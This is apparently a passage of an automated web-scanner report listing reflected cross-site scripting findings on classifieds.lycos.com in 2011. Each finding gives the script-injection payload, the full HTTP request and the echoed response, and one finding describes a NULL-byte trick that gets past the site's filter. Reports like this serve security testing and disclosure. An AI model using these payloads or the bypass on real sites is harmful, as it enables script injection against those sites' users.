The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d0ca"><script>alert(1)</script>968c7855b12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/?mobile=1" rel="nofollow">
...[SNIP]...

1.205. http://classifieds.lycos.com/service-pet-veterinarian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-veterinarian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d8a"><script>alert(1)</script>5f431f82572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1&mobile=1" rel="nofollow">
...[SNIP]...

1.206. http://classifieds.lycos.com/service-tech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-tech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19db0"><script>alert(1)</script>d7c28e4b076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-tech19db0"><script>alert(1)</script>d7c28e4b076/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-tech19db0"><script>alert(1)</script>d7c28e4b076/?mobile=1" rel="nofollow">
...[SNIP]...

1.207. http://classifieds.lycos.com/service-tech/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ab1"><script>alert(1)</script>24d279bc44e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:16:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.208. http://classifieds.lycos.com/service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8a1"><script>alert(1)</script>8e9027af6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicead8a1"><script>alert(1)</script>8e9027af6c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:59 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/servicead8a1"><script>alert(1)</script>8e9027af6c/?mobile=1" rel="nofollow">
...[SNIP]...

1.209. http://classifieds.lycos.com/service/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c09"><script>alert(1)</script>d95411a21e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/?68c09"><script>alert(1)</script>d95411a21e3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service/?68c09"><script>alert(1)</script>d95411a21e3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.210. http://classifieds.lycos.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46a3"><script>alert(1)</script>52170a0140d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemapd46a3"><script>alert(1)</script>52170a0140d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sitemapd46a3"><script>alert(1)</script>52170a0140d/?mobile=1" rel="nofollow">
...[SNIP]...

1.211. http://classifieds.lycos.com/sitemap/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddd3"><script>alert(1)</script>90a1bbc1cb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 96318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.212. http://classifieds.lycos.com/vehicle-boat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd873"><script>alert(1)</script>a3b7f789261 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/?mobile=1" rel="nofollow">
...[SNIP]...

1.213. http://classifieds.lycos.com/vehicle-boat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-boat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f6b7"><script>alert(1)</script>f4fcf37b3ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1&mobile=1" rel="nofollow">
...[SNIP]...

1.214. http://classifieds.lycos.com/vehicle-car-convertible/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-convertible/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1fd"><script>alert(1)</script>885ff275591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/?mobile=1" rel="nofollow">
...[SNIP]...

1.215. http://classifieds.lycos.com/vehicle-car-convertible/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-convertible/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63cc"><script>alert(1)</script>c9c5f17cb02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 102597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1&mobile=1" rel="nofollow">
...[SNIP]...

1.216. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9749e"><script>alert(1)</script>0dc818c9da5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893?mobile=1" rel="nofollow">
...[SNIP]...

1.217. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b82f"><script>alert(1)</script>db619e10b8c was submitted in the REST URL parameter 2. This input was echoed as 7b82f"><script>alert(1)</script>db619e10b8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:01:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:01:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c?mobile=1" rel="nofollow">
...[SNIP]...

1.218. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16927"><script>alert(1)</script>eb489a6e3c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:30 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fcoupe; path=/
Set-Cookie: classifieds[lastpage][0][name]=Coupes; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1&mobile=1" rel="nofollow">
...[SNIP]...

